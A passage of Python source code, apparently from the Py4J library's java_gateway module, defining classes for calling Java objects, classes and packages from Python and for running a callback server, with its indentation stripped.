raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
self._jvm_id = proto.DEFAULT_JVM_ID
self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won"t be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = self._create_gateway_client()
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = self._create_gateway_property()
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
def _create_gateway_client(self):
gateway_client = GatewayClient(
gateway_parameters=self.gateway_parameters)
return gateway_client
def _create_gateway_property(self):
gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool(),
self.gateway_parameters.enable_memory_management)
if self.python_server_entry_point:
gateway_property.pool.put(
self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem for some
scenarios though.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth)
if enable_auth:
_port, _auth_token = _ret
else:
_port, _auth_token = _ret, None
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token))
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = WeakSet()
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = self._create_connection(
socket_instance, input)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
del(self.pool[obj_id])
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blokincg, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
logger.info("Closing down callback connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
